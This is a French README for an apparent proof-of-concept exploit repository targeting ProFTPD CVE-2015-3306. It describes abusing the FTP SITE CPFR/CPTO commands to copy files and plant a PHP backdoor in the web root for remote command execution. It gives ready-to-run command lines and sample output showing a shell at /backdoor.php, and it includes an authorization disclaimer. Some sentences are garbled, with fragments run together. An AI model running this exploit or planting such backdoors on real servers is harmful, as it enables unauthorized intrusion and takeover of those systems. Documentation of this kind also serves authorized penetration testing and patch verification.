
Exploit PoC Python pour la traversée de répertoire ProFTPD CVE-2015-3306. Copie des fichiers et dépose une backdoor PHP dans le webroot pour l'exécution de commandes à distance via les commandes FTP SITE CPFR/CPTO.
Ce dépôt contient un exploit de preuve de concept (PoC) en Python pour CVE-2015-3306
⚠️ Avertissement : Utilisez ceci uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. L'exploitation non autorisée est illégale.
Mohamed EL-KHAROUATI
CVE-2015-3306 est une vulnérabilité de traversée de répertoire dans ProFTPD 1.3.5b et antérieur. Cet exploit permet de copier des fichiers arbitraires et de placer une porte dérobée PHP dans la racine web. La porte dérobée peut exécuter des commandes shell arbitraires.
SITE CPFR/CPTO.backdoor.php) dans la racine web spécifiée.--rcommand.requests (pip install requests)# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>
# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami
# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip>
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done